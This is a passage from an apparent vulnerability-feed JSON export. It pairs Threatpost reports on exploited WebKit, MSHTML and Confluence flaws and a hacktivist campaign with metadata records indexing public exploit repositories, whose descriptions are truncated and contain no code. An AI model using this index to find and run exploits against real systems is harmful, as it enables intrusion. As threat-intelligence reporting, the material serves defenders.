discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. **[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-11T13:45:45", "type": "threatpost", "title": "Apple Patches Actively Exploited WebKit Zero Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "modified": "2022-02-11T13:45:45", "id": "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "href": "https://threatpost.com/apple-patches-actively-exploited-webkit-zero-day/178370/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T07:51:24", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-17...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T03:44:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T04:45:33", "id": "1C45657B-E388-5668-9093-F3934858B728", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T00:00:34", "description": "# CVE-2022-21882\n\nWin32k Elevation Of Privileges\n\nTechn...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T21:28:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2021-1732"], "modified": "2022-03-15T22:03:21", "id": "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T20:28:07", "description": "# CVE-2021-1732\n\nWin32k Elevation Of Privileges\n\nTechni...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T16:55:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-15T17:00:00", "id": "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T06:07:29", "description": "# CVE-2021-30551\n\nMy exp for chrome V8...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-22T14:15:23", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-04-01T03:53:55", "id": "55D44407-F5C9-50A9-B51D-0D4F668CD993", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:49:33", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:05:07", "description": "# CVE-2022-21882\n\nWin32k Elevation...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T11:25:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2023-09-16T21:50:57", "id": "9C08AAB4-D76D-550C-ADA2-175E9AC92E38", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 